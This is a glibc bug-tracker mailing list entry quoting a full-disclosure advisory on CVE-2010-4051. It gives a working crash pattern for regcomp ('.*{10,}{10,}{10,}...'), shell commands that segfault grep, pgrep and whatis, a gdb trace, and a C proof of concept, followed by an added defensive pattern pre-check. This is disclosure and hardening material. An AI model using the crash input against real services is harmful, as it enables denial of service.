This is the mail archive of the glibc-bugs@sourceware.org mailing list for the glibc project.
[Bug regex/18013] New: Stack overflow due to deep recursion in regcomp (CVE-2010-4051)
- From: "fweimer at redhat dot com" <sourceware-bugzilla at sourceware dot org>
- To: glibc-bugs at sourceware dot org
- Date: Tue, 24 Feb 2015 12:39:54 +0000
- Subject: [Bug regex/18013] New: Stack overflow due to deep recursion in regcomp (CVE-2010-4051)
- Auto-submitted: auto-generated
https://sourceware.org/bugzilla/show_bug.cgi?id=18013
Bug ID: 18013
Summary: Stack overflow due to deep recursion in regcomp (CVE-2010-4051)
Product: glibc
Version: unspecified
Status: NEW
Severity: normal
Priority: P2
Component: regex
Assignee: unassigned at sourceware dot org
Reporter: fweimer at redhat dot com
CC: drepper.fsp at gmail dot com
This is the first report from <http://seclists.org/fulldisclosure/2011/Jan/78>,
included below:
--- 1. RE_DUP_MAX overflow ---
The main problem exists in the regcomp(3) function of the GNU libc
implementation. Let's try to understand.
---
int
regcomp (preg, pattern, cflags)
regex_t *__restrict preg;
const char *__restrict pattern;
int cflags;
{
---
If we use '{', the token type will be OP_OPEN_DUP_NUM.
---
/* This function parse repetition operators like "*", "+", "{1,3}" etc. */
static bin_tree_t *
parse_dup_op (bin_tree_t *elem, re_string_t *regexp, re_dfa_t *dfa,
re_token_t *token, reg_syntax_t syntax, reg_errcode_t *err)
{
bin_tree_t *tree = NULL, *old_tree = NULL;
int i, start, end, start_idx = re_string_cur_idx (regexp);
re_token_t start_token = *token;
if (token->type == OP_OPEN_DUP_NUM)
{
end = 0;
start = fetch_number (regexp, token, syntax); /* <===== CONVERT VALUE */
---
Let's see fetch_number:
---
static int
fetch_number (re_string_t *input, re_token_t *token, reg_syntax_t syntax)
{
int num = -1;
unsigned char c;
while (1)
{
fetch_token (token, input, syntax);
c = token->opr.c;
if (BE (token->type == END_OF_RE, 0))
return -2;
if (token->type == OP_CLOSE_DUP_NUM || c == ',')
break;
num = ((token->type != CHARACTER || c < '0' || '9' < c || num == -2)
? -2 : ((num == -1) ? c - '0' : num * 10 + c - '0'));
num = (num > RE_DUP_MAX) ? -2 : num;
}
return num;
}
---
Now see regex.h to know what value RE_DUP_MAX has.
---
/* Maximum number of duplicates an interval can allow. Some systems
(erroneously) define this in other header files, but we want our
value, so remove any previous define. */
# ifdef RE_DUP_MAX
# undef RE_DUP_MAX
# endif
/* If sizeof(int) == 2, then ((1 << 15) - 1) overflows. */
# define RE_DUP_MAX (0x7fff)
#endif
---
calc_eclosure_iter() will call calc_eclosure_iter() many times and
crash in malloc(3). Simple recursion.
So we can't use a value bigger than 0x7fff in {n,}. regcomp(3) should return
an error if we use the '{' token more than one time.
There are many attack vectors:
grep(1):
cx () cx64:~$ ls |grep -E ".*{10,}{10,}{10,}{10,}{10,}"
Segmentation fault
pgrep(1):
cx () cx64:~$ pgrep ".*{10,}{10,}{10,}{10,}{10,}"
Segmentation fault
bregex from bacula-director-common
cx () cx64:~$ bregex -f glob-0day.c
Enter regex pattern: .*{10,}{10,}{10,}{10,}{10,}
Segmentation fault
whatis(1):
cx () cx64:~$ whatis -r ".*{10,}{10,}{10,}{10,}{10,}"
Segmentation fault
and more like proftpd.
Simple crash for CVE-2010-4051
(gdb) x/i $rip
=> 0x7ffff7ad3ea2: mov %eax,0x50(%rsp)
(gdb) x/i $eax
0x2: Cannot access memory at address 0x2
(gdb) x/i $rsp
0x7fffff5fef90: Cannot access memory at address 0x7fffff5fef90
(gdb) x/i 0x50($rsp)
Cannot access memory at address 0x7fffff5fef08
#0 0x00007ffff7ad3ea2 in ?? () from /lib/libc.so.6
#1 0x00007ffff7ad538e in malloc () from /lib/libc.so.6
#2 0x00007ffff7b17d9b in ?? () from /lib/libc.so.6
#3 0x00007ffff7b17f0b in ?? () from /lib/libc.so.6
#4 0x00007ffff7b17f0b in ?? () from /lib/libc.so.6
#5 0x00007ffff7b17f0b in ?? () from /lib/libc.so.6
#6 0x00007ffff7b17f0b in ?? () from /lib/libc.so.6
#7 0x00007ffff7b17f0b in ?? () from /lib/libc.so.6
...
---PoC1---
#include <regex.h>
int main(void){
    regex_t preg;
    // char fmt[]=".*{10,}{10,}{10,}{10,}"; // CVE-2010-4052
    char fmt[]=".*{10,}{10,}{10,}{10,}{10,}"; // CVE-2010-4051
    /* compiling the stacked-interval pattern is enough; the crash happens inside regcomp */
    regcomp (&preg, fmt, REG_EXTENDED);
    return 0;
}
---PoC1---
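As an added example (not part of the advisory above and not glibc code): a pre-check a program can run on an untrusted ERE pattern before handing it to regcomp(3), counting how many interval operators like the stacked {10,} in the PoC sit back to back. The function names max_stacked_intervals and pattern_is_safe are assumed, and the check only looks at braces, not at the numbers inside them.

```c
/* Added example, not from the advisory or glibc: count back-to-back
 * "{...}" interval operators in an ERE pattern so a caller can refuse
 * patterns such as ".*{10,}{10,}{10,}{10,}{10,}" before regcomp(3). */
#include <stddef.h>
#include <string.h>

/* Returns the longest run of consecutive "{...}" operators in PATTERN.
 * Braces inside a bracket expression and backslash-escaped braces are
 * literals and are not counted. An unterminated '{' ends the scan. */
size_t max_stacked_intervals(const char *pattern)
{
    size_t run = 0, best = 0;
    const char *p = pattern;

    while (*p) {
        if (*p == '\\' && p[1]) {       /* escaped character: literal */
            p += 2; run = 0; continue;
        }
        if (*p == '[') {                /* skip a whole bracket expression */
            const char *q = p + 1;
            if (*q == '^') q++;
            if (*q == ']') q++;         /* a leading ']' is literal */
            while (*q && *q != ']') q++;
            p = *q ? q + 1 : q;
            run = 0; continue;
        }
        if (*p == '{') {
            const char *close = strchr(p + 1, '}');
            if (!close) break;          /* unterminated: stop counting */
            run++;
            if (run > best) best = run;
            p = close + 1;
            continue;
        }
        run = 0;                        /* any other char breaks the run */
        p++;
    }
    return best;
}

/* Policy helper: 1 if PATTERN may be passed to regcomp, 0 if it should be
 * rejected. LIMIT is the number of adjacent intervals tolerated (1 = none
 * stacked on another). */
int pattern_is_safe(const char *pattern, size_t limit)
{
    return max_stacked_intervals(pattern) <= limit;
}
```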